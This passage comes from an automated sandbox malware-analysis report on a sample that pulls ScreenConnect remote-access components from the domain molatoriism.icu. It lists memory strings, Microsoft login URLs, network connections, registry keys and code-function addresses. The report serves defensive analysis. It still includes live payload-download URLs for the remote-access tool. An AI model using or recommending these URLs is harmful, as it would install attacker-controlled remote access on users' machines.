                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D92C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfssuer
                  Source: svchost.exe, 00000008.00000003.1364648785.000002001D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000008.00000003.1364059093.000002001D92C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000008.00000003.1364648785.000002001D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806011
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806034
                  Source: svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364350500.000002001D957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364165885.000002001D95A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000008.00000002.2594952683.000002001D0D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                  Source: svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000003.1364469812.000002001D927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                  Source: dfsvc.exe, 00000001.00000002.2246395181.000001676A541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Core.dllF
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Wind
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2246161480.0000016768887000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E13A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.2245232290.000001676872D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2245232290.000001676872D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configRi
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exeR61fR
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2245876378.0000016768820000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E13A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2245876378.0000016768820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe6fffi
                  Source: dfsvc.exe, 00000001.00000002.2245232290.000001676872D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2245232290.000001676872D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe.config0j
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exeL6#f4
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exel7
                  Source: svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                  Source: unknownHTTPS traffic detected: 104.21.96.148:443 -> 192.168.2.9:49727 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  Source: pzPO97QouM.exePE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009CA4950_2_009CA495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D027581_2_00007FF887D02758
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D033B11_2_00007FF887D033B1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CFAF4F1_2_00007FF887CFAF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D15D1F1_2_00007FF887D15D1F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D128701_2_00007FF887D12870
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CFF4411_2_00007FF887CFF441
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CF12401_2_00007FF887CF1240
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D131011_2_00007FF887D13101
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CF60501_2_00007FF887CF6050
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887CD70BA13_2_00007FF887CD70BA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887CD10D713_2_00007FF887CD10D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887CD10CF13_2_00007FF887CD10CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE039513_2_00007FF887FE0395
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE5BB113_2_00007FF887FE5BB1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE5DC413_2_00007FF887FE5DC4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE299413_2_00007FF887FE2994
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE67DD13_2_00007FF887FE67DD
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440
                  Source: pzPO97QouM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
